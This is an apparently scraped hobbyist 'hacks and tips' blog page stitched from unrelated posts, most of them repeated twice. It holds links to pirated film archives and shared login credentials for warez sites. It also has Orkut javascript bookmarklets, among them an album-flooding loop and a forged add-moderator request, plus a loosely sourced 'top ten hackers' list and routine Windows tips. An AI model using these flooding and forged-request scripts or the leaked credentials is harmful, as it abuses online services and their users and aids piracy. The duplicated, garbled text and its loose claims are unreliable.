http://rapidshare.com/files/92640389/After.Sex.2007.Festival.DVDRiP.XviD-iNTiMiD.part5.rar
http://rapidshare.com/files/92656070/After.Sex.2007.Festival.DVDRiP.XviD-iNTiMiD.part6.rar
http://rapidshare.com/files/92667376/After.Sex.2007.Festival.DVDRiP.XviD-iNTiMiD.part7.rar
http://rapidshare.com/files/92671017/After.Sex.2007.Festival.DVDRiP.XviD-iNTiMiD.part8.rar
abe yahan se kuch dload karlo =))
http://www.warezquality.com/
Username: ageg2020
Password : z8fsDfg3
Thanks to devil
www.unlimitedgamedownloads.com
Your username: ga20me
Your password: ke01feb
Username: ageg2020
Password : z8fsDfg3
Thanks to devil
www.unlimitedgamedownloads.com
Your username: ga20me
Your password: ke01feb
TOP TEN HACKERS
TOP 10 HACKERZ.....
TOP TEN HACKERS!!
Here is a list off the top 10 hacks of all time.
Early 1990s
Kevin Mitnick, often incorrectly called by many as god of hackers, broke into the computer systems of the world's top technology and telecommunications companies Nokia, Fujitsu, Motorola, and Sun Microsystems. He was arrested by the FBI in 1995, but later released on parole in 2000. He never termed his activity hacking, instead he called it social engineering.
November 2002
Englishman Gary McKinnon was arrested in November 2002 following an accusation that he hacked into more than 90 US military computer systems in the UK. He is currently undergoing trial in a British court for a "fast-track extradition" to the US where he is a wanted man. The next hearing in the case is slated for today.
1995
Russian computer geek Vladimir Levin effected what can easily be called The Italian Job online - he was the first person to hack into a bank to extract money. Early 1995, he hacked into Citibank and robbed $10 million. Interpol arrested him in the UK in 1995, after he had transferred money to his accounts in the US, Finland, Holland, Germany and Israel.
1990
When a Los Angeles area radio station announced a contest that awarded a Porsche 944S2 for the 102nd caller, Kevin Poulsen took control of the entire city's telephone network, ensured he is the 102nd caller, and took away the Porsche beauty. He was arrested later that year and sentenced to three years in prison. He is currently a senior editor at Wired News.
1983
Kevin Poulsen again. A little-known incident when Poulsen, then just a student, hacked into Arpanet, the precursor to the Internet was hacked into. Arpanet was a global network of computers, and Poulsen took advantage of a loophole in its architecture to gain temporary control of the US-wide network.
1996
US hacker Timothy Lloyd planted six lines of malicious software code in the computer network of Omega Engineering which was a prime supplier of components for NASA and the US Navy. The code allowed a "logic bomb" to explode that deleted software running Omega's manufacturing operations. Omega lost $10 million due to the attack.
1988
Twenty-three-year-old Cornell University graduate Robert Morris unleashed the first Internet worm on to the world. Morris released 99 lines of code to the internet as an experiment, but realised that his program infected machines as it went along. Computers crashed across the US and elsewhere. He was arrested and sentenced in 1990.
1999
The Melissa virus was the first of its kind to wreak damage on a global scale. Written by David Smith (then 30), Melissa spread to more than 300 companies across the world completely destroying their computer networks. Damages reported amounted to nearly $400 million. Smith was arrested and sentenced to five years in prison.
2000
MafiaBoy, whose real identity has been kept under wraps because he is a minor, hacked into some of the largest sites in the world, including eBay, Amazon and Yahoo between February 6 and Valentine's Day in 2000. He gained access to 75 computers in 52 networks, and ordered a Denial of Service attack on them. He was arrested in 2000.
1993
They called themselves Masters of Deception, targeting US phone systems. The group hacked into the National Security Agency, AT&T, and Bank of America. It created a system that let them bypass long-distance phone call systems, and gain access to the pbx of major carriers.
TOP TEN HACKERS!!
Here is a list off the top 10 hacks of all time.
Early 1990s
Kevin Mitnick, often incorrectly called by many as god of hackers, broke into the computer systems of the world's top technology and telecommunications companies Nokia, Fujitsu, Motorola, and Sun Microsystems. He was arrested by the FBI in 1995, but later released on parole in 2000. He never termed his activity hacking, instead he called it social engineering.
November 2002
Englishman Gary McKinnon was arrested in November 2002 following an accusation that he hacked into more than 90 US military computer systems in the UK. He is currently undergoing trial in a British court for a "fast-track extradition" to the US where he is a wanted man. The next hearing in the case is slated for today.
1995
Russian computer geek Vladimir Levin effected what can easily be called The Italian Job online - he was the first person to hack into a bank to extract money. Early 1995, he hacked into Citibank and robbed $10 million. Interpol arrested him in the UK in 1995, after he had transferred money to his accounts in the US, Finland, Holland, Germany and Israel.
1990
When a Los Angeles area radio station announced a contest that awarded a Porsche 944S2 for the 102nd caller, Kevin Poulsen took control of the entire city's telephone network, ensured he is the 102nd caller, and took away the Porsche beauty. He was arrested later that year and sentenced to three years in prison. He is currently a senior editor at Wired News.
1983
Kevin Poulsen again. A little-known incident when Poulsen, then just a student, hacked into Arpanet, the precursor to the Internet was hacked into. Arpanet was a global network of computers, and Poulsen took advantage of a loophole in its architecture to gain temporary control of the US-wide network.
1996
US hacker Timothy Lloyd planted six lines of malicious software code in the computer network of Omega Engineering which was a prime supplier of components for NASA and the US Navy. The code allowed a "logic bomb" to explode that deleted software running Omega's manufacturing operations. Omega lost $10 million due to the attack.
1988
Twenty-three-year-old Cornell University graduate Robert Morris unleashed the first Internet worm on to the world. Morris released 99 lines of code to the internet as an experiment, but realised that his program infected machines as it went along. Computers crashed across the US and elsewhere. He was arrested and sentenced in 1990.
1999
The Melissa virus was the first of its kind to wreak damage on a global scale. Written by David Smith (then 30), Melissa spread to more than 300 companies across the world completely destroying their computer networks. Damages reported amounted to nearly $400 million. Smith was arrested and sentenced to five years in prison.
2000
MafiaBoy, whose real identity has been kept under wraps because he is a minor, hacked into some of the largest sites in the world, including eBay, Amazon and Yahoo between February 6 and Valentine's Day in 2000. He gained access to 75 computers in 52 networks, and ordered a Denial of Service attack on them. He was arrested in 2000.
1993
They called themselves Masters of Deception, targeting US phone systems. The group hacked into the National Security Agency, AT&T, and Bank of America. It created a system that let them bypass long-distance phone call systems, and gain access to the pbx of major carriers.
Wi-Fi Without Routers on XP!!!!!!!!!!
SHARING YOUR EXISTING ETHERNET INTERNET CONNECTION.
1. Go to Control Panel -> Network Connection.
2. Right click on Your Ethernet connection and click on “Properties”.
3. Go to “Advanced” Tab.
4. Check “Allow Other NEtwork….. Internet Connection”
5. In the Drop down Below select the Wifi connection of your pc. If it is disabled, it will be showing your wifi connection already.
6. Click on “Settings”
7. Check the protocols you need to share. Jamal has explained on them.I normally use only http and https.
8. Click on “Ok”.you reach the network connection page. The sharing part is now over.
FINDING DNS SERVER IP ADDRESS.
1. Click on Start -> Run
2. Type in cmd in the Run prompt
3. In the new window type “ipconfig /all” and press enter.
4. Note down your DNS server ip address from the screen.
CONFIGURING THE WIFI
1. Go again to Control Panel -> network connections.
2. Right click on your WIFI connection and click “properties”.
3. Go to”Wireless Network” Tab.
4. The “use windows to configure my wireless network connection” should be checked.
5. In the preferred network connection section click on add button
6. Enter a name of your wish to the network name.
7. Network authentication is “open”
8. Change Data Encryption to “Disabled”
9. Check the “this is a computer to computer …. not used” connection.
10. Click “Ok”.
11. Click on general tab. select “internet protocol(tcp/ip) and click on properties button.
12. Now type 192.168.0.1 in ip address, 255.255.255.0 in subnet mask, leave default gateway empty.
13. Fill in the DNS server entry which you had noted down earlier.
14. Click on “OK” and your network is set.
Your network should appear on the wifi network list now. Search for wlan on your phone. Connect and enjoy browsing on your phone.
1. Go to Control Panel -> Network Connection.
2. Right click on Your Ethernet connection and click on “Properties”.
3. Go to “Advanced” Tab.
4. Check “Allow Other NEtwork….. Internet Connection”
5. In the Drop down Below select the Wifi connection of your pc. If it is disabled, it will be showing your wifi connection already.
6. Click on “Settings”
7. Check the protocols you need to share. Jamal has explained on them.I normally use only http and https.
8. Click on “Ok”.you reach the network connection page. The sharing part is now over.
FINDING DNS SERVER IP ADDRESS.
1. Click on Start -> Run
2. Type in cmd in the Run prompt
3. In the new window type “ipconfig /all” and press enter.
4. Note down your DNS server ip address from the screen.
CONFIGURING THE WIFI
1. Go again to Control Panel -> network connections.
2. Right click on your WIFI connection and click “properties”.
3. Go to”Wireless Network” Tab.
4. The “use windows to configure my wireless network connection” should be checked.
5. In the preferred network connection section click on add button
6. Enter a name of your wish to the network name.
7. Network authentication is “open”
8. Change Data Encryption to “Disabled”
9. Check the “this is a computer to computer …. not used” connection.
10. Click “Ok”.
11. Click on general tab. select “internet protocol(tcp/ip) and click on properties button.
12. Now type 192.168.0.1 in ip address, 255.255.255.0 in subnet mask, leave default gateway empty.
13. Fill in the DNS server entry which you had noted down earlier.
14. Click on “OK” and your network is set.
Your network should appear on the wifi network list now. Search for wlan on your phone. Connect and enjoy browsing on your phone.
SCRIPTS
accept all pending members:-
javascript: i=0; document.body.innerHTML+=''; setInterval('i++;x=document.forms[ i ];x.target="z";_submitForm(x, "acceptPending");',1200);void(0)
add as a frnd be ur own fan...may b not working right now.... :(
javascript:document.body.innerHTML='';void(0)
add mod.. in com...
3.
javascript:a=document.forms[1];a.action="CommMembers.aspx?cmm=35299132&Action.addModerator&memberId=15805729382395197068";a.submit(); void(0)
BLINK
xXx rulez
invisible profile
javascript:kaniam=3;for(m=2;m<4;m++){document.forms[kaniam].elements[m].value=String.fromCharCode(6156);};_submitForm(document.forms[rehtnap],'update','');void(0);
javascript:for(m=2;m<4;m++){document.forms[4].elements[m].value=String.fromCharCode(6156);};_submitForm(document.forms[4],'update','');void(0);
Get Orkut Details
Via:
Connection:
Proxy-connection:
Expires:
Date:
Content-type:
Cache-Control:
Prgma:
Content-Encoding:
Server:
Run This Code In The Adress Bar And Wait !
javascript:a=new XMLHttpRequest();a.open("GET",location,true);a.onreadystatechange=function(){if(a.readyState==4){alert(a.getAllResponseHeaders())}};a.send(null)
Accept / Reject all Testimonials
Script To Accept All Testimonials
javascript:i=1;setInterval('_submitForm(document.forms[ i ],"handleTestimonial");i=i+2',800);void(0)
Script To Reject All Testimonials
javascript:i=2;setInterval('_submitForm(document.forms[ i ],"handleTestimonial");i=i+2',800);void(0)
Unmask your Password
javascript: alert(document.getElementById('Passwd').value);
Paste this in your address bar where you login after writting your login press enter and then you can see the Password.
Make Scrap Bigger In Size
javascript: function nik(){document.forms[1].elements[2].rows="30";}void(setInterval(nik,0));
Accept All Friend Requests
javascript: i=0; document.body.innerHTML+=''; setInterval('i++;x=document.forms[ i ];x.target="z";_submitForm(x, "acceptPending");',1200);void(0)
Album Flooder
1) http://www.orkut.com/Album.aspx
2)Browse Picture You Wanna Flood !
3) Enter This Script : javascript:function kok(){_submitForm(document.forms[1], 'upload', '');}void(setInterval(kok,350));
Colour Scraps
javascript:cor=new Array('b','green','yellow','red' );var z=0;txt=document.getElementsByTagName('textarea')[0];txt.value=txt.value.replace(/(.)/gi,"§$1");txt.value=txt.value.replace(/\§ /gi," ");for(y=0;y
1) Open any scrapbook.
2) Write your message in the scrap. Do NOT click on submit.
3) Copy the following text and paste it in your address bar
4) Hit ENTER key of your keyboard.
5) Click on Submit
javascript: i=0; document.body.innerHTML+=''; setInterval('i++;x=document.forms[ i ];x.target="z";_submitForm(x, "acceptPending");',1200);void(0)
add as a frnd be ur own fan...may b not working right now.... :(
javascript:document.body.innerHTML='';void(0)
add mod.. in com...
3.
javascript:a=document.forms[1];a.action="CommMembers.aspx?cmm=35299132&Action.addModerator&memberId=15805729382395197068";a.submit(); void(0)
BLINK
xXx rulez
invisible profile
javascript:kaniam=3;for(m=2;m<4;m++){document.forms[kaniam].elements[m].value=String.fromCharCode(6156);};_submitForm(document.forms[rehtnap],'update','');void(0);
javascript:for(m=2;m<4;m++){document.forms[4].elements[m].value=String.fromCharCode(6156);};_submitForm(document.forms[4],'update','');void(0);
Get Orkut Details
Via:
Connection:
Proxy-connection:
Expires:
Date:
Content-type:
Cache-Control:
Prgma:
Content-Encoding:
Server:
Run This Code In The Adress Bar And Wait !
javascript:a=new XMLHttpRequest();a.open("GET",location,true);a.onreadystatechange=function(){if(a.readyState==4){alert(a.getAllResponseHeaders())}};a.send(null)
Accept / Reject all Testimonials
Script To Accept All Testimonials
javascript:i=1;setInterval('_submitForm(document.forms[ i ],"handleTestimonial");i=i+2',800);void(0)
Script To Reject All Testimonials
javascript:i=2;setInterval('_submitForm(document.forms[ i ],"handleTestimonial");i=i+2',800);void(0)
Unmask your Password
javascript: alert(document.getElementById('Passwd').value);
Paste this in your address bar where you login after writting your login press enter and then you can see the Password.
Make Scrap Bigger In Size
javascript: function nik(){document.forms[1].elements[2].rows="30";}void(setInterval(nik,0));
Accept All Friend Requests
javascript: i=0; document.body.innerHTML+=''; setInterval('i++;x=document.forms[ i ];x.target="z";_submitForm(x, "acceptPending");',1200);void(0)
Album Flooder
1) http://www.orkut.com/Album.aspx
2)Browse Picture You Wanna Flood !
3) Enter This Script : javascript:function kok(){_submitForm(document.forms[1], 'upload', '');}void(setInterval(kok,350));
Colour Scraps
javascript:cor=new Array('b','green','yellow','red' );var z=0;txt=document.getElementsByTagName('textarea')[0];txt.value=txt.value.replace(/(.)/gi,"§$1");txt.value=txt.value.replace(/\§ /gi," ");for(y=0;y
1) Open any scrapbook.
2) Write your message in the scrap. Do NOT click on submit.
3) Copy the following text and paste it in your address bar
4) Hit ENTER key of your keyboard.
5) Click on Submit
*multiple login for google talk* & yahoo
g-talk..
1. Right-click on the desktop
2. Select New
3. Select Shortcut
4. Paste this into the text box:
"c:\program files\google\google talk\googletalk.exe" /nomutex
(dont miss even a comma)
5. Click Next6. Name it whatever: Google Talk Multiple, etc.
8. Click OK until you are done.
ENJOY>>>>>>>>>>>>>>>>>>>>>>
yahoo/...**
multiple login for yahoo!!!
You can login with multiple id's on the same yahoo messenger without any download or patch .
Follow these steps
1. Go to Start ----> Run . Type regedit, then enter .
2.Navigate to HKEY_CURRENT_USER --------> Software --->yahoo ----->pager---->Test
3.On the right pane , right-click and choose new Dword value .
4.Rename it as Plural.
5.Double click and assign a decimal value of 1.
That's it done!!
Now close registry and restart yahoo messenger .For signing in with new id open another messenger .
1. Right-click on the desktop
2. Select New
3. Select Shortcut
4. Paste this into the text box:
"c:\program files\google\google talk\googletalk.exe" /nomutex
(dont miss even a comma)
5. Click Next6. Name it whatever: Google Talk Multiple, etc.
8. Click OK until you are done.
ENJOY>>>>>>>>>>>>>>>>>>>>>>
yahoo/...**
multiple login for yahoo!!!
You can login with multiple id's on the same yahoo messenger without any download or patch .
Follow these steps
1. Go to Start ----> Run . Type regedit, then enter .
2.Navigate to HKEY_CURRENT_USER --------> Software --->yahoo ----->pager---->Test
3.On the right pane , right-click and choose new Dword value .
4.Rename it as Plural.
5.Double click and assign a decimal value of 1.
That's it done!!
Now close registry and restart yahoo messenger .For signing in with new id open another messenger .
What to do if get this error--Key server not found
What to do if get this error--Key server not found-- While opening software?
You may have doubt while opening software which is installed in ACCC novell server services it will be showing this error key server not found.How to rectify this problem "key server not found" ,while opening software?
Well this is the major problem occurs while opening software after installation from ACCC novell server.You will be seeing this-- error Key server not found-- as soon as you double click on software.Well this problem can be rectified by 2 solutions.
Solution 1:
You have to do following steps:
1)Search for this file "keyacc*.*" without quotes in your system.
2)Delete all keyacc*.* files which you have found.
3)Open this file winstall (n:\winstall\installss.exe)
4)This will check all keyacc files.It will take few minutes for checking those files.When it does not find them it will put them in the locations which will fix keyserv issues..
If the above solution does not work then follow the sloution 2.
Solution 2:
If solution 1 does not work then you have to do small work..Just replace contents of keyacc.ini file with the following code..
Just copy the below code.........
[setup]
transport=udp
translist=udpipx
[logon]
host=keyserv.cc.uic.edu
user=%user%
pass=
[options]
aged=yes
sync=no
save=no
icon=yes
lock=no
quit=yes
skip=-5
registry=0
silent=0
minimize=1
persist=0
yield=0
close=0
usev=1
sleep=1
You may have doubt while opening software which is installed in ACCC novell server services it will be showing this error key server not found.How to rectify this problem "key server not found" ,while opening software?
Well this is the major problem occurs while opening software after installation from ACCC novell server.You will be seeing this-- error Key server not found-- as soon as you double click on software.Well this problem can be rectified by 2 solutions.
Solution 1:
You have to do following steps:
1)Search for this file "keyacc*.*" without quotes in your system.
2)Delete all keyacc*.* files which you have found.
3)Open this file winstall (n:\winstall\installss.exe)
4)This will check all keyacc files.It will take few minutes for checking those files.When it does not find them it will put them in the locations which will fix keyserv issues..
If the above solution does not work then follow the sloution 2.
Solution 2:
If solution 1 does not work then you have to do small work..Just replace contents of keyacc.ini file with the following code..
Just copy the below code.........
[setup]
transport=udp
translist=udpipx
[logon]
host=keyserv.cc.uic.edu
user=%user%
pass=
[options]
aged=yes
sync=no
save=no
icon=yes
lock=no
quit=yes
skip=-5
registry=0
silent=0
minimize=1
persist=0
yield=0
close=0
usev=1
sleep=1
Only one trick to hack windows.It takes only few .
I know this is a very simple thing but the problem, as like many other issues, is the ignorance about it.
How often do you copy songs from a CD? Or some photos from a CD?
What do you do? You select the required files and do a CTRL –C. Open the destination folder and do a CTRL-V. Here is something you can benefit time from. customize your SEND TO MENU.
This sounds simple and you can do it in less than sixty seconds.
You can create your own BASKET.
First you’ll need access to hidden files. So change your view settings to make all hidden files visible.
Tools -> folder options -> view (tab) and select the show hidden files and folders.
go to parent drive:/documents and settings/(user name)/send to
Open up my computer and locate your most used folders.
Create a shortcut of the most used folders in SEND TO FOLDER.You can do this in a number of ways.
Right click -> send to desktop(create shortcut) and move the shortcut from the desktop to the SEND TO FOLDER
Copy the most used folder and go to SEND TO FOLDER and right click -> paste shortcut.
Also remember to rename the shortcuts to send to videos or send to potos. We don’t need confusion when we use the same later.
5. DONE
How often do you copy songs from a CD? Or some photos from a CD?
What do you do? You select the required files and do a CTRL –C. Open the destination folder and do a CTRL-V. Here is something you can benefit time from. customize your SEND TO MENU.
This sounds simple and you can do it in less than sixty seconds.
You can create your own BASKET.
First you’ll need access to hidden files. So change your view settings to make all hidden files visible.
Tools -> folder options -> view (tab) and select the show hidden files and folders.
go to parent drive:/documents and settings/(user name)/send to
Open up my computer and locate your most used folders.
Create a shortcut of the most used folders in SEND TO FOLDER.You can do this in a number of ways.
Right click -> send to desktop(create shortcut) and move the shortcut from the desktop to the SEND TO FOLDER
Copy the most used folder and go to SEND TO FOLDER and right click -> paste shortcut.
Also remember to rename the shortcuts to send to videos or send to potos. We don’t need confusion when we use the same later.
5. DONE
some cool run commands (can help u)
some cool run commands (can help u)
Power Configuration - powercfg.cpl
Printers and Faxes - control printers
Printers Folder - printers
Private Character Editor - eudcedit
Quicktime (If Installed)- QuickTime.cpl
Quicktime Player (if installed)- quicktimeplayer
Real Player (if installed)- realplay
Regional Settings - intl.cpl
Registry Editor - regedit
Registry Editor - regedit32
Remote Access Phonebook - rasphone
Remote Desktop - mstsc
Removable Storage - ntmsmgr.msc
Removable Storage Operator Requests - ntmsoprq.msc
Resultant Set of Policy (XP Prof) - rsop.msc
Scanners and Cameras - sticpl.cpl
Scheduled Tasks - control schedtasks
Security Center - wscui.cpl
Services - services.msc
Shared Folders - fsmgmt.msc
Shuts Down Windows - shutdown
Sounds and Audio - mmsys.cpl
Spider Solitare Card Game - spider
SQL Client Configuration - cliconfg
System Configuration Editor - sysedit
System Configuration Utility - msconfig
System File Checker Utility (Scan Immediately)- sfc /scannow
System File Checker Utility (Scan Once At Next Boot)- sfc /scanonce
System File Checker Utility (Scan On Every Boot) - sfc /scanboot
System File Checker Utility (Return to Default Setting)- sfc /revert
System File Checker Utility (Purge File Cache)- sfc /purgecache
System File Checker Utility (Set Cache Size to size x)-sfc/cachesize=x
System Information- msinfo32
System Properties - sysdm.cpl
Task Manager - taskmgr
TCP Tester - tcptest
Telnet Client - telnet
Tweak UI (if installed) - tweakui
User Account Management- nusrmgr.cpl
Utility Manager - utilman
Accessibility Controls- access.cpl
Add Hardware Wizard- hdwwiz.cpl
Add/Remove Programs- appwiz.cpl
Administrative Tools- control admintools
Automatic Updates- wuaucpl.cpl
Bluetooth Transfer Wizard- fsquirt
Calculator- calc
Certificate Manager- certmgr.msc
Character Map- charmap
Check Disk Utility- chkdsk
Clipboard Viewer- clipbrd
Command Prompt- cmd
Component Services- dcomcnfg
Computer Management- compmgmt.msc
timedate.cpl- ddeshare
Device Manager- devmgmt.msc
Direct X Control Panel (If Installed)*- directx.cpl
Direct X Troubleshooter- dxdiag
Disk Cleanup Utility- cleanmgr
Disk Defragment- dfrg.msc
Disk Management- diskmgmt.msc
Disk Partition Manager- diskpart
Display Properties- control desktop
Display Properties- desk.cpl
Display Properties (w/Appearance Tab Preselected)- control color
Dr. Watson System Troubleshooting Utility- drwtsn32
Driver Verifier Utility- verifier
Event Viewer- eventvwr.msc
File Signature Verification Tool- sigverif
Findfast- findfast.cpl
Folders Properties- control folders
Fonts- control fonts
Fonts Folder- fonts
Free Cell Card Game- freecell
Game Controllers- joy.cpl
Group Policy Editor (XP Prof)- gpedit.msc
Hearts Card Game- mshearts
Iexpress Wizard- iexpress
Indexing Service- ciadv.msc
Internet Properties- inetcpl.cpl
IP Configuration (Display Connection Configuration) ipconfig /all
IP Configuration (Display DNS Cache Contents) ipconfig /displaydns
IP Configuration (Delete DNS Cache Contents)- ipconfig /flushdns
IP Configuration (Release All Connections)- ipconfig /release
IP Configuration (Renew All Connections)- ipconfig /renew
IP Configuration (Refreshes DHCP & Re-Registers DNS)- ipconfig /registerdns
IP Configuration (Display DHCP Class ID)- ipconfig /showclassid
NARRATOR.EXE - Microsoft Narrator
NETSETUP.EXE - Network Setup Wizard
NOTEPAD.EXE - Notepad
NSLOOKUP.EXE - NSLookup Application
NTSD.EXE - Symbolic Debugger for Windows 2000
ODBCAD32.EXE - ODBC Data Source Administrator
OSK.EXE - On Screen Keyboard
OSUNINST.EXE - Windows Uninstall Utility
PACKAGER.EXE - Object Packager
PERFMON.EXE - Performance Monitor
PROGMAN.EXE - Program Manager
RASPHONE.EXE - Remote Access Phonebook
REGEDIT.EXE - Registry Editor
REGEDT32.EXE - Registry Editor
RESET.EXE - Resets Session
RSTRUI.EXE - System Restore
RTCSHARE.EXE - RTC Application Sharing
SFC.EXE - System File Checker
SHRPUBW.EXE - Create Shared Folder
SHUTDOWN.EXE - System Shutdown
SIGVERIF.EXE - File Signature Verification
SNDREC32.EXE - Sound Recorder
SNDVOL32.EXE - Sound Volume
SOL.EXE - Solitaire
SPIDER.EXE - Spider Solitaire
SYNCAPP.EXE - Create A Briefcase
SYSEDIT.EXE - System Configuration Editor
SYSKEY.EXE - SAM Lock Tool
TASKMGR.EXE - Task Manager
TELNET.EXE - MS Telnet Client
TSSHUTDN.EXE - System Shutdown
TOURSTART.EXE - Windows Tour Launcher
UTILMAN.EXE - System Utility Manager
USERINIT.EXE - My Documents
VERIFIER.EXE - Driver Verifier Manager
WIAACMGR.EXE - Scanner and Camera Wizard
WINCHAT.EXE - Windows for Workgroups Chat
WINHELP.EXE - Windows Help Engine
WINHLP32.EXE - Help
WINMINE.EXE - Minesweeper
WINVER.EXE - Windows Version Information
WRITE.EXE - WordPad
WSCRIPT.EXE - Windows Script Host Settings
WUPDMGR.EXE - Windows Update
ACCESS.CPL - Accessibility Options
APPWIZ.CPL - Add or Remove Programs
DESK.CPL - Display Properties
HDWWIZ.CPL - Add Hardware Wizard
INETCPL.CPL - Internet Explorer Properties
INTL.CPL - Regional and Language Options
JOY.CPL - Game Controllers
MAIN.CPL - Mouse Properties
MMSYS.CPL - Sounds and Audio Device Properties
NCPA.CPL - Network Connections
NUSRMGR.CPL - User Accounts
ODBCCP32.CPL - ODBC Data Source Administrator
POWERCFG.CPL - Power Options Properties
SYSDM.CPL - System Properties
TELEPHON.CPL - Phone and Modem Options
TIMEDATE.CPL - Date and Time Properties
CERTMGR.MSC - Certificates
CIADV.MSC - Indexing Service
COMPMGMT.MSC - Computer Management
DEVMGMT.MSC - Device Manager
DFRG.MSC - Disk Defragmenter
DISKMGMT.MSC - Disk Management
EVENTVWR.MSC - Event Viewer
FSMGMT.MSC - Shared Folders
LUSRMGR.MSC - Local Users and Groups
NTMSMGR.MSC - Removable Storage
NTMSOPRQ.MSC - Removable Storage Operator Requests
PERFMON.MSC - Performance Monitor
SERVICES.MSC - Services
WMIMGMT.MSC - Windows Management Infrastructure
Power Configuration - powercfg.cpl
Printers and Faxes - control printers
Printers Folder - printers
Private Character Editor - eudcedit
Quicktime (If Installed)- QuickTime.cpl
Quicktime Player (if installed)- quicktimeplayer
Real Player (if installed)- realplay
Regional Settings - intl.cpl
Registry Editor - regedit
Registry Editor - regedit32
Remote Access Phonebook - rasphone
Remote Desktop - mstsc
Removable Storage - ntmsmgr.msc
Removable Storage Operator Requests - ntmsoprq.msc
Resultant Set of Policy (XP Prof) - rsop.msc
Scanners and Cameras - sticpl.cpl
Scheduled Tasks - control schedtasks
Security Center - wscui.cpl
Services - services.msc
Shared Folders - fsmgmt.msc
Shuts Down Windows - shutdown
Sounds and Audio - mmsys.cpl
Spider Solitare Card Game - spider
SQL Client Configuration - cliconfg
System Configuration Editor - sysedit
System Configuration Utility - msconfig
System File Checker Utility (Scan Immediately)- sfc /scannow
System File Checker Utility (Scan Once At Next Boot)- sfc /scanonce
System File Checker Utility (Scan On Every Boot) - sfc /scanboot
System File Checker Utility (Return to Default Setting)- sfc /revert
System File Checker Utility (Purge File Cache)- sfc /purgecache
System File Checker Utility (Set Cache Size to size x)-sfc/cachesize=x
System Information- msinfo32
System Properties - sysdm.cpl
Task Manager - taskmgr
TCP Tester - tcptest
Telnet Client - telnet
Tweak UI (if installed) - tweakui
User Account Management- nusrmgr.cpl
Utility Manager - utilman
Accessibility Controls- access.cpl
Add Hardware Wizard- hdwwiz.cpl
Add/Remove Programs- appwiz.cpl
Administrative Tools- control admintools
Automatic Updates- wuaucpl.cpl
Bluetooth Transfer Wizard- fsquirt
Calculator- calc
Certificate Manager- certmgr.msc
Character Map- charmap
Check Disk Utility- chkdsk
Clipboard Viewer- clipbrd
Command Prompt- cmd
Component Services- dcomcnfg
Computer Management- compmgmt.msc
timedate.cpl- ddeshare
Device Manager- devmgmt.msc
Direct X Control Panel (If Installed)*- directx.cpl
Direct X Troubleshooter- dxdiag
Disk Cleanup Utility- cleanmgr
Disk Defragment- dfrg.msc
Disk Management- diskmgmt.msc
Disk Partition Manager- diskpart
Display Properties- control desktop
Display Properties- desk.cpl
Display Properties (w/Appearance Tab Preselected)- control color
Dr. Watson System Troubleshooting Utility- drwtsn32
Driver Verifier Utility- verifier
Event Viewer- eventvwr.msc
File Signature Verification Tool- sigverif
Findfast- findfast.cpl
Folders Properties- control folders
Fonts- control fonts
Fonts Folder- fonts
Free Cell Card Game- freecell
Game Controllers- joy.cpl
Group Policy Editor (XP Prof)- gpedit.msc
Hearts Card Game- mshearts
Iexpress Wizard- iexpress
Indexing Service- ciadv.msc
Internet Properties- inetcpl.cpl
IP Configuration (Display Connection Configuration) ipconfig /all
IP Configuration (Display DNS Cache Contents) ipconfig /displaydns
IP Configuration (Delete DNS Cache Contents)- ipconfig /flushdns
IP Configuration (Release All Connections)- ipconfig /release
IP Configuration (Renew All Connections)- ipconfig /renew
IP Configuration (Refreshes DHCP & Re-Registers DNS)- ipconfig /registerdns
IP Configuration (Display DHCP Class ID)- ipconfig /showclassid
NARRATOR.EXE - Microsoft Narrator
NETSETUP.EXE - Network Setup Wizard
NOTEPAD.EXE - Notepad
NSLOOKUP.EXE - NSLookup Application
NTSD.EXE - Symbolic Debugger for Windows 2000
ODBCAD32.EXE - ODBC Data Source Administrator
OSK.EXE - On Screen Keyboard
OSUNINST.EXE - Windows Uninstall Utility
PACKAGER.EXE - Object Packager
PERFMON.EXE - Performance Monitor
PROGMAN.EXE - Program Manager
RASPHONE.EXE - Remote Access Phonebook
REGEDIT.EXE - Registry Editor
REGEDT32.EXE - Registry Editor
RESET.EXE - Resets Session
RSTRUI.EXE - System Restore
RTCSHARE.EXE - RTC Application Sharing
SFC.EXE - System File Checker
SHRPUBW.EXE - Create Shared Folder
SHUTDOWN.EXE - System Shutdown
SIGVERIF.EXE - File Signature Verification
SNDREC32.EXE - Sound Recorder
SNDVOL32.EXE - Sound Volume
SOL.EXE - Solitaire
SPIDER.EXE - Spider Solitaire
SYNCAPP.EXE - Create A Briefcase
SYSEDIT.EXE - System Configuration Editor
SYSKEY.EXE - SAM Lock Tool
TASKMGR.EXE - Task Manager
TELNET.EXE - MS Telnet Client
TSSHUTDN.EXE - System Shutdown
TOURSTART.EXE - Windows Tour Launcher
UTILMAN.EXE - System Utility Manager
USERINIT.EXE - My Documents
VERIFIER.EXE - Driver Verifier Manager
WIAACMGR.EXE - Scanner and Camera Wizard
WINCHAT.EXE - Windows for Workgroups Chat
WINHELP.EXE - Windows Help Engine
WINHLP32.EXE - Help
WINMINE.EXE - Minesweeper
WINVER.EXE - Windows Version Information
WRITE.EXE - WordPad
WSCRIPT.EXE - Windows Script Host Settings
WUPDMGR.EXE - Windows Update
ACCESS.CPL - Accessibility Options
APPWIZ.CPL - Add or Remove Programs
DESK.CPL - Display Properties
HDWWIZ.CPL - Add Hardware Wizard
INETCPL.CPL - Internet Explorer Properties
INTL.CPL - Regional and Language Options
JOY.CPL - Game Controllers
MAIN.CPL - Mouse Properties
MMSYS.CPL - Sounds and Audio Device Properties
NCPA.CPL - Network Connections
NUSRMGR.CPL - User Accounts
ODBCCP32.CPL - ODBC Data Source Administrator
POWERCFG.CPL - Power Options Properties
SYSDM.CPL - System Properties
TELEPHON.CPL - Phone and Modem Options
TIMEDATE.CPL - Date and Time Properties
CERTMGR.MSC - Certificates
CIADV.MSC - Indexing Service
COMPMGMT.MSC - Computer Management
DEVMGMT.MSC - Device Manager
DFRG.MSC - Disk Defragmenter
DISKMGMT.MSC - Disk Management
EVENTVWR.MSC - Event Viewer
FSMGMT.MSC - Shared Folders
LUSRMGR.MSC - Local Users and Groups
NTMSMGR.MSC - Removable Storage
NTMSOPRQ.MSC - Removable Storage Operator Requests
PERFMON.MSC - Performance Monitor
SERVICES.MSC - Services
WMIMGMT.MSC - Windows Management Infrastructure
Telnet
Learning Telnet
::Don't use this for illegal stuff::
Introduction:
Telnet is used to connect to remote machines through emulation. This means that
it can connect to a server, any server instantly because of it's ability to emulate (copy)
remote computers.
Lets Start:
In Windows, Telnet can be found by going to Start -> Run and then typing telnet.
The application should then pop up. If you don't have Windows, there are many Telnet alternatives for mac, linux etc. Since I don't know any,search the internet for Telnet for Linux or Telnet for Mac and you should find something instantly.
